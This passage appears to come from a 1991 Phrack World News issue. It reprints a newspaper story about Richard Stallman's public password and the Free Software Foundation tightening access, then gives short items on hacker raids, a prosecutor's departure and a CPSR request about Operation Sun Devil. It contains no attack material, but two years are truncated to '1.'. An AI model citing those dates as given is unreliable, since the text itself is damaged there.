Times) The foundation was started by Richard Stallman, who was awarded a MacArthur Foundation fellowship in 1. While mainstream software companies have prohibited users from freely copying their programs, Stallman, who is widely respected for developing computer languages and software editing tools, has argued that information is not the same as other commodities and should be shared without cost. His password has been widely known among network users because he has refused to keep it secret. He is bitter about the changes that have accompanied the coming of age of computer networks. Last month, after security was increased at the foundation and many users were stripped of their guest privileges, Stallman said he considered giving up his quest. In the end, he decided that the cause of creating free software was too important to abandon, but he said he feels like a pariah. "Since I won't agree to have a real password, I will only be able to log in on the 'inside' machines," he wrote in an electronic message in response to a reporter's query. "I still feel partly ashamed of participating in this. I've been forced to choose between two principles, both of which are so important to me that I won't accept the loss of either of them." Idealists like Stallman and Ted Nelson, the author of the cult classic "Computer Lib," hoped that the computer revolution wouldn't be like the industrial revolution. This time the wealth -- information -- would be free to everyone and instant communication would break down the barriers between rich and poor and remake mankind. Marvin Minsky, a computer science professor at MIT, said that for 15 years, beginning in 1963, researchers at the school lived in a paradise, sharing computers and networks before a system of password protection was installed. Now that has changed. "It's sad," he said. "But Richard Stallman is living in a dream world. He has this view that his idea of computer ethics will prevail. But it's not going to happen this year or next." Instead of finding community on computer networks, many users are now confronted with virus invasions and information theft, leading to the same sense of alienation and fear felt by residents of large cities. "At first I thought this was Marshall McLuhan's global village coming to reality," said Neil Harris, a manager at General Electric Information Services Co., which sets up computer conferences and sells information to about 200,000 members around the world. "But it's not that at all. It's a lot of people connecting in hundreds of small communities based around highly specific interests." Steven Levy, who has written about the early days of computing at MIT, said that the demise of the Free Software Foundation's open door policy was inevitable. "When you pass the plate around in church you don't expect people to steal from it," he said. "But sooner or later everyone knows that the plate is unguarded, and there are always people who don't care about the church. The question is how far do you go to protect it? Do you lock the church or do you send an armed guard around with the plate?" ______________________________________________________________________________ PWN Quicknotes ~~~~~~~~~~~~~ 1. On June 12, 1991, Sirhackalot's equipment was confiscated by the Southern Bell and the FBI without any charges being filed. Neither the FBI nor Southern Bell bothered to explain why they were in his home and taking his personal possessions. Again neither party could tell Sirhackalot what he supposedly did to bring both agency's to his doorstep. Also busted were Mr.Doo and The Imortal Phreak. [Special Thanks: The Marauder (404)] _______________________________________________________________________________ 2. Bill Cook is no longer an assistant United States Attorney in Chicago. It is unknown how he left his position. Basic questions go unanswered. Did he quit or was fired? If he was fired, we'd like to know exactly why. _______________________________________________________________________________ 3. Wanted: Targets of Operation Sun Devil Computer Professionals for Social Responsibility (CPSR) is pursuing a lawsuit against the Secret Service seeking the release of information concerning Operation Sun Devil. In recently filed court papers, the agency claims that the information cannot be disclosed because, among other reasons, disclosure would violate the privacy of those individuals who are the targets of the investigation. This argument can be overcome if CPSR obtains signed releases from those individuals. CPSR is requesting the cooperation of anyone who was the subject of a Sun Devil raid on or about May 7, 1. We are prepared to enter into an attorney- client relationship with individuals responding to this request, so that confidentiality will be assured. Please respond ASAP to: David Sobel CPSR Legal Counsel (202) 544-9240 dsobel@washofc.cpsr.org _______________________________________________________________________________ 4. Recently Microsoft discovered it was the victim of trespassing. A security guard noticed two people playing volleyball on the premises and knew that they did not work for Microsoft. The officer approached the volleyball players and asked them to leave. The trespassers left. Later someone asked the security guard how he knew that the people playing volleyball were not Microsoft employees. He replied, "They had tans." [Special Thanks: Psychotic Surfer] _______________________________________________________________________________